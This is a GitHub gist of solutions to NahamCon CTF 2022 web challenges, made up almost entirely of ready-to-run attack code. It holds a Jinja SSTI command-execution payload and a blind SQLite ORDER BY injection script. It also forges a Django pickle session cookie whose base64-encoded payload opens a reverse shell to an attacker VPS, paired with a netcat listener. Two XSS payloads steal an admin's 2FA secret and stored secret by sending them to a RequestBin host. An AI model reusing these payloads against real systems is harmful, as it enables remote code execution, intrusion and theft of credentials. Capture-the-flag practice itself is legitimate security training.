name=taidh&email=taidh@cc{{joiner.__init__.__globals__.os.popen('cat${IFS}flag*').read()}}
Created
April 30, 2022 18:52
-
-
Save DauHoangTai/f6ace49fa6d6cbf4ed0e0c0dcc4ab334 to your computer and use it in GitHub Desktop.
NahamCon CTF 2022 - Solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# SQLite Injection (Order by) | |
import requests | |
import string | |
import re | |
URL = "http://challenge.nahamcon.com:31423" # Change URL | |
res_regex = '<td style="width:20%">(.*?)</td>' | |
flag = '' | |
for i in range(1,500): | |
for char in string.ascii_letters + '_{}': | |
print(char,end='\r') | |
data = {'search':'a','order':f'(case when (substr((select flag from flag),{i},1)="{char}") then atomic_number else name end)'} | |
r = requests.post(URL, data=data) | |
res = re.findall(res_regex,r.text)[0] | |
if "12" in res: | |
flag += char | |
print(flag) | |
break |
-
Find SECRET_KEY in source github
-
Picker Serialize Recommended to use Django 4.0.4
import os
import django.core.signing
import pickle
import base64
import django.contrib.sessions.serializers as serializers
SECRET_KEY = '77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!'
salt = 'django.contrib.sessions.backends.signed_cookies'
class Command(object):
def __reduce__(self):
return (os.system,("echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiW0ldIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9zaCIpJwo= | base64 -d | sh",)) # Decode string base64 and change to your IP vps
my_cookie= django.core.signing.dumps(Command(),key=SECRET_KEY,salt= salt, serializer=serializers.PickleSerializer,compress=True)
print(my_cookie)
nc -lvnp 4444
in your VPS- Change above cookie to
sessionid
There are xss in feedback
- Leak OTP admin
<script>fetch('/reset2fa',{method: 'POST'}).then(r=>r.json()).then(r=>{fetch('http://[RequestBin]?cc='+r.url);});</script>
Then login at Google Authenticator with username admin and secret receive
- Show secret of admin
<script>
fetch('/show_secret', {
method: 'POST',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json'
},
body: JSON.stringify({otp: 680661, secretId: 1}) //change OTP
}).then(r=>r.text()).then(r=>{fetch('http://[RequestBin]?cc='+btoa(r));});
</script>
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment